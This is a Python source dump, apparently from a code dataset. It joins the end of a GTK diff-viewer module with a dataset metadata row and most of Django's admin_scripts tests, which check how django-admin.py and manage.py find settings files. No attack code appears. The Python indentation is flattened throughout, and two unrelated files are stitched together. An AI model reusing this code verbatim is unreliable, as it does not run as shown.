def on_consoleview_populate_popup(self, text, menu):
item = gtk.ImageMenuItem(gtk.STOCK_CLEAR)
def activate(*args):
buf = text.get_buffer()
buf.delete( buf.get_start_iter(), buf.get_end_iter() )
item.connect("activate", activate)
item.show()
menu.insert( item, 0 )
item = gtk.SeparatorMenuItem()
item.show()
menu.insert( item, 1 )
def next_diff(self, direction):
start_iter = self.model.get_iter( (self._get_selected_treepaths() or [(0,)])[-1] )
def goto_iter(it):
curpath = self.model.get_path(it)
for i in range(len(curpath)-1):
self.treeview.expand_row( curpath[:i+1], 0)
self.treeview.set_cursor(curpath)
search = {gtk.gdk.SCROLL_UP : self.model.inorder_search_up}.get(direction, self.model.inorder_search_down)
for it in search( start_iter ):
state = int(self.model.get_state( it, 0))
if state not in (tree.STATE_NORMAL, tree.STATE_EMPTY):
goto_iter(it)
return
def on_reload_activate(self, *extra):
self.on_fileentry_activate(self.fileentry)
| gpl-2.0 |
danilito19/django | tests/admin_scripts/tests.py | 95 | 91070 | # -*- coding: utf-8 -*-
"""
A series of tests to establish that the command-line management tools work as
advertised - especially with regards to the handling of the
DJANGO_SETTINGS_MODULE and default settings.py files.
"""
from __future__ import unicode_literals
import codecs
import os
import re
import shutil
import socket
import subprocess
import sys
import tempfile
import unittest
import django
from django import conf, get_version
from django.conf import settings
from django.core.management import (
BaseCommand, CommandError, call_command, color,
)
from django.db import ConnectionHandler
from django.db.migrations.exceptions import MigrationSchemaMissing
from django.db.migrations.recorder import MigrationRecorder
from django.test import (
LiveServerTestCase, SimpleTestCase, mock, override_settings,
)
from django.test.runner import DiscoverRunner
from django.utils._os import npath, upath
from django.utils.encoding import force_text
from django.utils.six import PY3, StringIO
test_dir = os.path.realpath(os.path.join(tempfile.gettempdir(), 'test_project'))
if not os.path.exists(test_dir):
os.mkdir(test_dir)
open(os.path.join(test_dir, '__init__.py'), 'w').close()
custom_templates_dir = os.path.join(os.path.dirname(upath(__file__)), 'custom_templates')
SYSTEM_CHECK_MSG = 'System check identified no issues'
class AdminScriptTestCase(unittest.TestCase):
def write_settings(self, filename, apps=None, is_dir=False, sdict=None, extra=None):
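        """Write a throwaway settings module into the temporary test project.
        Illustrative call: write_settings('settings.py', apps=['admin_scripts'])
        creates test_project/settings.py, re-exporting DATABASES etc. from the
        real settings and setting INSTALLED_APPS = ['admin_scripts'].
        """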
if is_dir:
settings_dir = os.path.join(test_dir, filename)
os.mkdir(settings_dir)
settings_file_path = os.path.join(settings_dir, '__init__.py')
else:
settings_file_path = os.path.join(test_dir, filename)
with open(settings_file_path, 'w') as settings_file:
            settings_file.write('# -*- coding: utf-8 -*-\n')
settings_file.write('# Settings file automatically generated by admin_scripts test case\n')
if extra:
settings_file.write("%s\n" % extra)
exports = [
'DATABASES',
'ROOT_URLCONF',
'SECRET_KEY',
'TEST_RUNNER', # We need to include TEST_RUNNER, otherwise we get a compatibility warning.
'MIDDLEWARE_CLASSES', # We need to include MIDDLEWARE_CLASSES, otherwise we get a compatibility warning.
]
for s in exports:
if hasattr(settings, s):
o = getattr(settings, s)
if not isinstance(o, (dict, tuple, list)):
o = "'%s'" % o
settings_file.write("%s = %s\n" % (s, o))
if apps is None:
apps = ['django.contrib.auth', 'django.contrib.contenttypes', 'admin_scripts']
settings_file.write("INSTALLED_APPS = %s\n" % apps)
if sdict:
for k, v in sdict.items():
settings_file.write("%s = %s\n" % (k, v))
def remove_settings(self, filename, is_dir=False):
full_name = os.path.join(test_dir, filename)
if is_dir:
shutil.rmtree(full_name)
else:
os.remove(full_name)
# Also try to remove the compiled file; if it exists, it could
# mess up later tests that depend upon the .py file not existing
try:
if sys.platform.startswith('java'):
# Jython produces module$py.class files
os.remove(re.sub(r'\.py$', '$py.class', full_name))
else:
# CPython produces module.pyc files
os.remove(full_name + 'c')
except OSError:
pass
# Also remove a __pycache__ directory, if it exists
cache_name = os.path.join(test_dir, '__pycache__')
if os.path.isdir(cache_name):
shutil.rmtree(cache_name)
def _ext_backend_paths(self):
"""
Returns the paths for any external backend packages.
"""
paths = []
first_package_re = re.compile(r'(^[^\.]+)\.')
for backend in settings.DATABASES.values():
result = first_package_re.findall(backend['ENGINE'])
if result and result != ['django']:
backend_pkg = __import__(result[0])
backend_dir = os.path.dirname(backend_pkg.__file__)
paths.append(os.path.dirname(backend_dir))
return paths
def run_test(self, script, args, settings_file=None, apps=None):
base_dir = os.path.dirname(test_dir)
# The base dir for Django's tests is one level up.
tests_dir = os.path.dirname(os.path.dirname(upath(__file__)))
# The base dir for Django is one level above the test dir. We don't use
# `import django` to figure that out, so we don't pick up a Django
# from site-packages or similar.
django_dir = os.path.dirname(tests_dir)
ext_backend_base_dirs = self._ext_backend_paths()
# Define a temporary environment for the subprocess
test_environ = os.environ.copy()
if sys.platform.startswith('java'):
python_path_var_name = 'JYTHONPATH'
else:
python_path_var_name = 'PYTHONPATH'
old_cwd = os.getcwd()
# Set the test environment
if settings_file:
test_environ['DJANGO_SETTINGS_MODULE'] = str(settings_file)
elif 'DJANGO_SETTINGS_MODULE' in test_environ:
del test_environ['DJANGO_SETTINGS_MODULE']
python_path = [base_dir, django_dir, tests_dir]
python_path.extend(ext_backend_base_dirs)
# Use native strings for better compatibility
test_environ[str(python_path_var_name)] = npath(os.pathsep.join(python_path))
test_environ[str('PYTHONWARNINGS')] = str('')
# Move to the test directory and run
os.chdir(test_dir)
out, err = subprocess.Popen([sys.executable, script] + args,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=test_environ, universal_newlines=True).communicate()
# Move back to the old working directory
os.chdir(old_cwd)
return out, err
def run_django_admin(self, args, settings_file=None):
script_dir = os.path.abspath(os.path.join(os.path.dirname(upath(django.__file__)), 'bin'))
return self.run_test(os.path.join(script_dir, 'django-admin.py'), args, settings_file)
def run_manage(self, args, settings_file=None):
def safe_remove(path):
try:
os.remove(path)
except OSError:
pass
conf_dir = os.path.dirname(upath(conf.__file__))
template_manage_py = os.path.join(conf_dir, 'project_template', 'manage.py')
test_manage_py = os.path.join(test_dir, 'manage.py')
shutil.copyfile(template_manage_py, test_manage_py)
with open(test_manage_py, 'r') as fp:
manage_py_contents = fp.read()
manage_py_contents = manage_py_contents.replace(
"{{ project_name }}", "test_project")
with open(test_manage_py, 'w') as fp:
fp.write(manage_py_contents)
self.addCleanup(safe_remove, test_manage_py)
return self.run_test('./manage.py', args, settings_file)
def assertNoOutput(self, stream):
"Utility assertion: assert that the given stream is empty"
self.assertEqual(len(stream), 0, "Stream should be empty: actually contains '%s'" % stream)
def assertOutput(self, stream, msg, regex=False):
"Utility assertion: assert that the given message exists in the output"
stream = force_text(stream)
if regex:
self.assertIsNotNone(re.search(msg, stream),
"'%s' does not match actual output text '%s'" % (msg, stream))
else:
self.assertIn(msg, stream, "'%s' does not match actual output text '%s'" % (msg, stream))
def assertNotInOutput(self, stream, msg):
"Utility assertion: assert that the given message doesn't exist in the output"
stream = force_text(stream)
self.assertNotIn(msg, stream, "'%s' matches actual output text '%s'" % (msg, stream))
##########################################################################
# DJANGO ADMIN TESTS
# This first series of test classes checks the environment processing
# of the django-admin.py script
##########################################################################
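# A standalone sketch (illustrative only, never called by the tests) of the
# invocation pattern this series relies on via run_django_admin() above:
# django-admin.py is executed in a subprocess whose environment either carries
# DJANGO_SETTINGS_MODULE or deliberately lacks it. The real helper also
# adjusts PYTHONPATH and the working directory; this sketch omits that.
def _demo_invoke_django_admin(args, settings_module=None):
    env = os.environ.copy()
    env.pop('DJANGO_SETTINGS_MODULE', None)  # start with no settings at all
    if settings_module:
        env['DJANGO_SETTINGS_MODULE'] = settings_module
    script = os.path.join(os.path.dirname(upath(django.__file__)), 'bin', 'django-admin.py')
    proc = subprocess.Popen([sys.executable, script] + list(args),
                            stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                            env=env, universal_newlines=True)
    return proc.communicate()  # -> (out, err), as the assertions below expect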
class DjangoAdminNoSettings(AdminScriptTestCase):
"A series of tests for django-admin.py when there is no settings.py file."
def test_builtin_command(self):
"no settings: django-admin builtin commands fail with an error when no settings provided"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, 'settings are not configured')
def test_builtin_with_bad_settings(self):
"no settings: django-admin builtin commands fail if settings file (from argument) doesn't exist"
args = ['check', '--settings=bad_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_builtin_with_bad_environment(self):
"no settings: django-admin builtin commands fail if settings file (from environment) doesn't exist"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args, 'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
class DjangoAdminDefaultSettings(AdminScriptTestCase):
"""A series of tests for django-admin.py when using a settings.py file that
contains the test application.
"""
def setUp(self):
self.write_settings('settings.py')
def tearDown(self):
self.remove_settings('settings.py')
def test_builtin_command(self):
"default: django-admin builtin commands fail with an error when no settings provided"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, 'settings are not configured')
def test_builtin_with_settings(self):
"default: django-admin builtin commands succeed if settings are provided as argument"
args = ['check', '--settings=test_project.settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_environment(self):
"default: django-admin builtin commands succeed if settings are provided in the environment"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args, 'test_project.settings')
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_bad_settings(self):
"default: django-admin builtin commands fail if settings file (from argument) doesn't exist"
args = ['check', '--settings=bad_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_builtin_with_bad_environment(self):
"default: django-admin builtin commands fail if settings file (from environment) doesn't exist"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args, 'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_custom_command(self):
"default: django-admin can't execute user commands if it isn't provided settings"
args = ['noargs_command']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "settings are not configured")
def test_custom_command_with_settings(self):
"default: django-admin can execute user commands if settings are provided as argument"
args = ['noargs_command', '--settings=test_project.settings']
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
def test_custom_command_with_environment(self):
"default: django-admin can execute user commands if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_django_admin(args, 'test_project.settings')
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
class DjangoAdminFullPathDefaultSettings(AdminScriptTestCase):
"""A series of tests for django-admin.py when using a settings.py file that
contains the test application specified using a full path.
"""
def setUp(self):
self.write_settings('settings.py', ['django.contrib.auth', 'django.contrib.contenttypes',
'admin_scripts', 'admin_scripts.complex_app'])
def tearDown(self):
self.remove_settings('settings.py')
def test_builtin_command(self):
"fulldefault: django-admin builtin commands fail with an error when no settings provided"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, 'settings are not configured')
def test_builtin_with_settings(self):
"fulldefault: django-admin builtin commands succeed if a settings file is provided"
args = ['check', '--settings=test_project.settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_environment(self):
"fulldefault: django-admin builtin commands succeed if the environment contains settings"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args, 'test_project.settings')
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_bad_settings(self):
"fulldefault: django-admin builtin commands fail if settings file (from argument) doesn't exist"
args = ['check', '--settings=bad_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_builtin_with_bad_environment(self):
"fulldefault: django-admin builtin commands fail if settings file (from environment) doesn't exist"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args, 'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_custom_command(self):
"fulldefault: django-admin can't execute user commands unless settings are provided"
args = ['noargs_command']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "settings are not configured")
def test_custom_command_with_settings(self):
"fulldefault: django-admin can execute user commands if settings are provided as argument"
args = ['noargs_command', '--settings=test_project.settings']
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
def test_custom_command_with_environment(self):
"fulldefault: django-admin can execute user commands if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_django_admin(args, 'test_project.settings')
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
class DjangoAdminMinimalSettings(AdminScriptTestCase):
"""A series of tests for django-admin.py when using a settings.py file that
doesn't contain the test application.
"""
def setUp(self):
self.write_settings('settings.py', apps=['django.contrib.auth', 'django.contrib.contenttypes'])
def tearDown(self):
self.remove_settings('settings.py')
def test_builtin_command(self):
"minimal: django-admin builtin commands fail with an error when no settings provided"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, 'settings are not configured')
def test_builtin_with_settings(self):
"minimal: django-admin builtin commands fail if settings are provided as argument"
args = ['check', '--settings=test_project.settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "No installed app with label 'admin_scripts'.")
def test_builtin_with_environment(self):
"minimal: django-admin builtin commands fail if settings are provided in the environment"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args, 'test_project.settings')
self.assertNoOutput(out)
self.assertOutput(err, "No installed app with label 'admin_scripts'.")
def test_builtin_with_bad_settings(self):
"minimal: django-admin builtin commands fail if settings file (from argument) doesn't exist"
args = ['check', '--settings=bad_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_builtin_with_bad_environment(self):
"minimal: django-admin builtin commands fail if settings file (from environment) doesn't exist"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args, 'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_custom_command(self):
"minimal: django-admin can't execute user commands unless settings are provided"
args = ['noargs_command']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "settings are not configured")
def test_custom_command_with_settings(self):
"minimal: django-admin can't execute user commands, even if settings are provided as argument"
args = ['noargs_command', '--settings=test_project.settings']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_environment(self):
"minimal: django-admin can't execute user commands, even if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_django_admin(args, 'test_project.settings')
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
class DjangoAdminAlternateSettings(AdminScriptTestCase):
"""A series of tests for django-admin.py when using a settings file
with a name other than 'settings.py'.
"""
def setUp(self):
self.write_settings('alternate_settings.py')
def tearDown(self):
self.remove_settings('alternate_settings.py')
def test_builtin_command(self):
"alternate: django-admin builtin commands fail with an error when no settings provided"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, 'settings are not configured')
def test_builtin_with_settings(self):
"alternate: django-admin builtin commands succeed if settings are provided as argument"
args = ['check', '--settings=test_project.alternate_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_environment(self):
"alternate: django-admin builtin commands succeed if settings are provided in the environment"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args, 'test_project.alternate_settings')
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_bad_settings(self):
"alternate: django-admin builtin commands fail if settings file (from argument) doesn't exist"
args = ['check', '--settings=bad_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_builtin_with_bad_environment(self):
"alternate: django-admin builtin commands fail if settings file (from environment) doesn't exist"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args, 'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_custom_command(self):
"alternate: django-admin can't execute user commands unless settings are provided"
args = ['noargs_command']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "settings are not configured")
def test_custom_command_with_settings(self):
"alternate: django-admin can execute user commands if settings are provided as argument"
args = ['noargs_command', '--settings=test_project.alternate_settings']
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
def test_custom_command_with_environment(self):
"alternate: django-admin can execute user commands if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_django_admin(args, 'test_project.alternate_settings')
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
class DjangoAdminMultipleSettings(AdminScriptTestCase):
"""A series of tests for django-admin.py when multiple settings files
(including the default 'settings.py') are available. The default settings
file is insufficient for performing the operations described, so the
alternate settings must be used by the running script.
"""
def setUp(self):
self.write_settings('settings.py', apps=['django.contrib.auth', 'django.contrib.contenttypes'])
self.write_settings('alternate_settings.py')
def tearDown(self):
self.remove_settings('settings.py')
self.remove_settings('alternate_settings.py')
def test_builtin_command(self):
"alternate: django-admin builtin commands fail with an error when no settings provided"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, 'settings are not configured')
def test_builtin_with_settings(self):
"alternate: django-admin builtin commands succeed if settings are provided as argument"
args = ['check', '--settings=test_project.alternate_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_environment(self):
"alternate: django-admin builtin commands succeed if settings are provided in the environment"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args, 'test_project.alternate_settings')
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_bad_settings(self):
"alternate: django-admin builtin commands fail if settings file (from argument) doesn't exist"
args = ['check', '--settings=bad_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_builtin_with_bad_environment(self):
"alternate: django-admin builtin commands fail if settings file (from environment) doesn't exist"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args, 'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_custom_command(self):
"alternate: django-admin can't execute user commands unless settings are provided"
args = ['noargs_command']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "settings are not configured")
def test_custom_command_with_settings(self):
"alternate: django-admin can execute user commands if settings are provided as argument"
args = ['noargs_command', '--settings=test_project.alternate_settings']
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
def test_custom_command_with_environment(self):
"alternate: django-admin can execute user commands if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_django_admin(args, 'test_project.alternate_settings')
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
class DjangoAdminSettingsDirectory(AdminScriptTestCase):
"""
A series of tests for django-admin.py when the settings file is in a
    directory (see #9751).
"""
def setUp(self):
self.write_settings('settings', is_dir=True)
def tearDown(self):
self.remove_settings('settings', is_dir=True)
def test_setup_environ(self):
"directory: startapp creates the correct directory"
args = ['startapp', 'settings_test']
app_path = os.path.join(test_dir, 'settings_test')
out, err = self.run_django_admin(args, 'test_project.settings')
self.addCleanup(shutil.rmtree, app_path)
self.assertNoOutput(err)
self.assertTrue(os.path.exists(app_path))
with open(os.path.join(app_path, 'apps.py'), 'r') as f:
content = f.read()
self.assertIn("class SettingsTestConfig(AppConfig)", content)
self.assertIn("name = 'settings_test'", content)
with open(os.path.join(app_path, '__init__.py'), 'r') as f:
content = f.read()
expected_content = "default_app_config = 'settings_test.apps.SettingsTestConfig'"
self.assertIn(expected_content, content)
if not PY3:
with open(os.path.join(app_path, 'models.py'), 'r') as fp:
content = fp.read()
self.assertIn(
"from __future__ import unicode_literals\n",
content,
)
def test_setup_environ_custom_template(self):
"directory: startapp creates the correct directory with a custom template"
template_path = os.path.join(custom_templates_dir, 'app_template')
args = ['startapp', '--template', template_path, 'custom_settings_test']
app_path = os.path.join(test_dir, 'custom_settings_test')
out, err = self.run_django_admin(args, 'test_project.settings')
self.addCleanup(shutil.rmtree, app_path)
self.assertNoOutput(err)
self.assertTrue(os.path.exists(app_path))
self.assertTrue(os.path.exists(os.path.join(app_path, 'api.py')))
def test_builtin_command(self):
"directory: django-admin builtin commands fail with an error when no settings provided"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, 'settings are not configured')
def test_builtin_with_bad_settings(self):
"directory: django-admin builtin commands fail if settings file (from argument) doesn't exist"
args = ['check', '--settings=bad_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_builtin_with_bad_environment(self):
"directory: django-admin builtin commands fail if settings file (from environment) doesn't exist"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args, 'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_custom_command(self):
"directory: django-admin can't execute user commands unless settings are provided"
args = ['noargs_command']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "settings are not configured")
def test_builtin_with_settings(self):
"directory: django-admin builtin commands succeed if settings are provided as argument"
args = ['check', '--settings=test_project.settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_environment(self):
"directory: django-admin builtin commands succeed if settings are provided in the environment"
args = ['check', 'admin_scripts']
out, err = self.run_django_admin(args, 'test_project.settings')
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
##########################################################################
# MANAGE.PY TESTS
# This next series of test classes checks the environment processing
# of the generated manage.py script
##########################################################################
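# For orientation: run_manage() above copies
# django/conf/project_template/manage.py into test_dir and substitutes the
# project name, so the script under test is essentially the stock template,
# sketched below (the exact contents vary between Django versions):
#
#     #!/usr/bin/env python
#     import os
#     import sys
#     if __name__ == "__main__":
#         os.environ.setdefault("DJANGO_SETTINGS_MODULE", "test_project.settings")
#         from django.core.management import execute_from_command_line
#         execute_from_command_line(sys.argv)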
class ManageNoSettings(AdminScriptTestCase):
"A series of tests for manage.py when there is no settings.py file."
def test_builtin_command(self):
"no settings: manage.py builtin commands fail with an error when no settings provided"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?(test_project\.)?settings'?", regex=True)
def test_builtin_with_bad_settings(self):
"no settings: manage.py builtin commands fail if settings file (from argument) doesn't exist"
args = ['check', '--settings=bad_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_builtin_with_bad_environment(self):
"no settings: manage.py builtin commands fail if settings file (from environment) doesn't exist"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args, 'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
class ManageDefaultSettings(AdminScriptTestCase):
"""A series of tests for manage.py when using a settings.py file that
contains the test application.
"""
def setUp(self):
self.write_settings('settings.py')
def tearDown(self):
self.remove_settings('settings.py')
def test_builtin_command(self):
"default: manage.py builtin commands succeed when default settings are appropriate"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_settings(self):
"default: manage.py builtin commands succeed if settings are provided as argument"
args = ['check', '--settings=test_project.settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_environment(self):
"default: manage.py builtin commands succeed if settings are provided in the environment"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args, 'test_project.settings')
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_bad_settings(self):
"default: manage.py builtin commands succeed if settings file (from argument) doesn't exist"
args = ['check', '--settings=bad_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_builtin_with_bad_environment(self):
"default: manage.py builtin commands fail if settings file (from environment) doesn't exist"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args, 'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_custom_command(self):
"default: manage.py can execute user commands when default settings are appropriate"
args = ['noargs_command']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
def test_custom_command_with_settings(self):
"default: manage.py can execute user commands when settings are provided as argument"
args = ['noargs_command', '--settings=test_project.settings']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
def test_custom_command_with_environment(self):
"default: manage.py can execute user commands when settings are provided in environment"
args = ['noargs_command']
out, err = self.run_manage(args, 'test_project.settings')
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
class ManageFullPathDefaultSettings(AdminScriptTestCase):
"""A series of tests for manage.py when using a settings.py file that
contains the test application specified using a full path.
"""
def setUp(self):
self.write_settings('settings.py', ['django.contrib.auth', 'django.contrib.contenttypes', 'admin_scripts'])
def tearDown(self):
self.remove_settings('settings.py')
def test_builtin_command(self):
"fulldefault: manage.py builtin commands succeed when default settings are appropriate"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_settings(self):
"fulldefault: manage.py builtin commands succeed if settings are provided as argument"
args = ['check', '--settings=test_project.settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_environment(self):
"fulldefault: manage.py builtin commands succeed if settings are provided in the environment"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args, 'test_project.settings')
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_bad_settings(self):
"fulldefault: manage.py builtin commands succeed if settings file (from argument) doesn't exist"
args = ['check', '--settings=bad_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_builtin_with_bad_environment(self):
"fulldefault: manage.py builtin commands fail if settings file (from environment) doesn't exist"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args, 'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_custom_command(self):
"fulldefault: manage.py can execute user commands when default settings are appropriate"
args = ['noargs_command']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
def test_custom_command_with_settings(self):
"fulldefault: manage.py can execute user commands when settings are provided as argument"
args = ['noargs_command', '--settings=test_project.settings']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
def test_custom_command_with_environment(self):
"fulldefault: manage.py can execute user commands when settings are provided in environment"
args = ['noargs_command']
out, err = self.run_manage(args, 'test_project.settings')
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
class ManageMinimalSettings(AdminScriptTestCase):
"""A series of tests for manage.py when using a settings.py file that
doesn't contain the test application.
"""
def setUp(self):
self.write_settings('settings.py', apps=['django.contrib.auth', 'django.contrib.contenttypes'])
def tearDown(self):
self.remove_settings('settings.py')
def test_builtin_command(self):
"minimal: manage.py builtin commands fail with an error when no settings provided"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "No installed app with label 'admin_scripts'.")
def test_builtin_with_settings(self):
"minimal: manage.py builtin commands fail if settings are provided as argument"
args = ['check', '--settings=test_project.settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "No installed app with label 'admin_scripts'.")
def test_builtin_with_environment(self):
"minimal: manage.py builtin commands fail if settings are provided in the environment"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args, 'test_project.settings')
self.assertNoOutput(out)
self.assertOutput(err, "No installed app with label 'admin_scripts'.")
def test_builtin_with_bad_settings(self):
"minimal: manage.py builtin commands fail if settings file (from argument) doesn't exist"
args = ['check', '--settings=bad_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_builtin_with_bad_environment(self):
"minimal: manage.py builtin commands fail if settings file (from environment) doesn't exist"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args, 'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_custom_command(self):
